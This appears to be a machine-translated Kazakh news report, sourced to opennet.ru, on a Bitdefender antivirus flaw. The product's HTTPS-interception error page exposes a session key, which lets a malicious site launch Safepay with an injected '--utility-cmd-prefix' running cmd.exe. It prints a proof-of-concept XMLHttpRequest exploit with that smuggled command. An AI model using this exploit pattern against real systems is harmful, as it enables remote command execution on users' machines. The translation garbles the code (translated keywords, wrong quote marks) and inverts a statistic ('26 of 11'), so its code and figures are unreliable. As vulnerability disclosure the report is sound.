Владимир Палант, Adblock Plus құрушысы,
Мәселенің себебі Bitdefender антивирусы сайттың бастапқы TLS сертификатын ауыстыру арқылы HTTPS трафигін жергілікті ұстауды жүзеге асырады. Клиент жүйесінде қосымша түбірлік сертификат орнатылған, ол қолданылатын жол қозғалысын тексеру жүйесінің жұмысын жасыруға мүмкіндік береді. Антивирус қорғалған трафикке сынады және Қауіпсіз іздеу функциясын жүзеге асыру үшін кейбір беттерге өзінің JavaScript кодын енгізеді және қауіпсіз қосылым сертификатында ақаулар туындаған жағдайда, ол қайтарылған қате бетін өз бетімен ауыстырады. Жаңа қате беті ашылып жатқан сервер атынан қызмет көрсететіндіктен, сол сервердегі басқа беттер Bitdefender енгізген мазмұнға толық қатынаса алады.
Шабуыл жасаушы басқаратын сайтты ашқан кезде, бұл сайт XMLHttpRequest жібере алады және жауап беру кезінде HTTPS сертификатымен ақауларды көрсете алады, бұл Bitdefender жалған қате бетін қайтаруға әкеледі. Қате беті шабуылдаушы доменінің контекстінде ашылғандықтан, ол Bitdefender параметрлерімен жалған беттің мазмұнын оқи алады. Bitdefender ұсынған бетте сонымен қатар еркін пәрмен жолы жалаушаларын көрсете отырып, бөлек Safepay браузер сеансын іске қосу үшін ішкі Bitdefender API пайдалануға мүмкіндік беретін сеанс кілті бар және «--utility-cmd-prefix» көмегімен кез келген жүйелік пәрмендерді іске қосады. жалау. Эксплуатация мысалы (param1 және param2 қате бетінен алынған мәндер):
var сұрау = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Мазмұн түрі", "қолданба/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Еске салайық, зерттеу 2017 жылы жүргізілген
11 өнімнің тек 26-і ғана ағымдағы шифрлар жиынтығын қамтамасыз етті. 5 жүйе сертификаттарды тексермеді (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security және Total Security өнімдері шабуылға ұшырады
Ақпарат көзі: opennet.ru